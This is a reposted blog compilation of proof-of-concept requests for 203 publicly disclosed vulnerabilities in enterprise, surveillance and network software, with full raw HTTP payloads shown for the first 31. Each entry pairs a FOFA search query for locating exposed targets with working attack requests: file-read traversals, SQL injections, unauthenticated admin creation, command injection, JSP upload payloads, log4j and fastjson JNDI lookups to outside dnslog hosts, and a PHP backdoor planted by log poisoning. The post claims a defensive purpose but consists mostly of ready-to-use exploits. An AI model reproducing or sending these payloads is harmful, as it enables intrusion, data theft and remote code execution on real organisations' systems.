Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界; author: 网络安全新视界
Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is meant to help defenders; defensive teams can use its contents to check their own exposure.

Vulnerability sources: The article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the Internet and compiled and published by the 网络安全新视界 team.

Security patches: All of these vulnerabilities are publicly known; for patches or remediation guidance, contact the product vendor.

Content: Due to length constraints, a few POCs that were too long have been replaced uniformly with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If any content infringes the legitimate rights of any party, please contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

01 Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. Goanywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <=20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

02 POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: first obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; it executes the function and base64-encodes
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the string ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
